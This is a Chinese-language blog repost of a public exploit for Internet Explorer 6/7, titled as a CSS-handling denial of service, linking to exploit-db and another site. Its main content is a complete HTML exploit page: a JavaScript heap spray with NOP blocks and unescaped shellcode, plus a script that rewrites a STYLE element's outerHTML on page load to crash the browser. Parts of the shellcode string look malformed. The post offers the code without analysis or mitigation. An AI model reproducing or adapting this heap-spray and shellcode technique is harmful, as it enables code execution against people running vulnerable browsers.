Internet Explorer 6/7 CSS Handling Denial of Service
2009年11月24日 |
IE6/7 CSS 处理拒绝服务
利用代码:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
<!-- securitylab.ir K4mr4n_st (at) yahoo (dot) com [email concealed] --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <script> function load(){ var e; e=document.getElementsByTagName("STYLE")[0]; e.outerHTML="1"; } </script> <STYLE type="text/css"> body{ overflow: scroll; margin: 0; } </style> <SCRIPT language="javascript"> var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EEu99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB0%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u 7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063"); var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (x=0; x<4000; x++) memory[x] = block + shellcode; </script> </HEAD> <BODY onload="load()"> </BODY> </HTML> |
http://www.exploit-db.com/exploits/10210
另付国人公布的内容,具体是谁抄谁的就不得而知了,各位看官自己判断吧!
http://www.yxlink.com/newsview_15.html
没有评论
暂无评论
RSS feed for comments on this post.
对不起,该文章的评论被关闭了!